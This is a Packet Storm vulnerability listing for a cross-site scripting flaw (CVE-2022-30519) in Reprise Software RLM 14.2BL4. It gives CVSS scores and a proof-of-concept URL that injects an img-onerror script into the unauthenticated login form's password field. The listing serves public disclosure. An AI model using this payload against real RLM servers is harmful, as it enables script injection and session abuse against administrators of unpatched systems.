Lucene search
Mohammed A.SiledarPACKETSTORM:171627HistoryApr 03, 2023 - 12:00 a.m.
Reprise Software RLM 14.2BL4 Cross Site Scripting
2023-04-0300:00:00
Mohammed A.Siledar
packetstormsecurity.com
134
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
`# Exploit Title: Reprise Software RLM v14.2BL4 - Cross-Site Scripting (XSS)
# Exploit Author: Mohammed A.Siledar
# Author Company : reprisesoftware
# Version: rlm.v14.2BL4
# Vendor home page : https://reprisesoftware.com
# Software Link: https://www.reprisesoftware.com/license_admin_kits/rlm.v14.2BL4-x64_w3.admin.exe
# Authentication Required: No
# CVE : CVE-2022-30519
# Tested on: Windows 10
# Proof Of Concept:
http://localhost/goform/login_process?username=admin&password=admin%22%3E%3Cimg%20src=x%20onerror=confirm(123)%3E
Best Regards.
`
Related
cve
cve
CVE-2022-30519
2022-12-29 23:15:00
cvelist
cvelist
CVE-2022-30519
2022-12-29 00:00:00
prion
prion
Code injection
2022-12-29 23:15:00
zdt
zdt
Reprise Software RLM v14.2BL4 - Cross-Site Scripting Vulnerability
2023-04-02 00:00:00
exploitdb
exploitdb
Reprise Software RLM v14.2BL4 - Cross-Site Scripting (XSS)
2023-04-01 00:00:00
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Related for PACKETSTORM:171627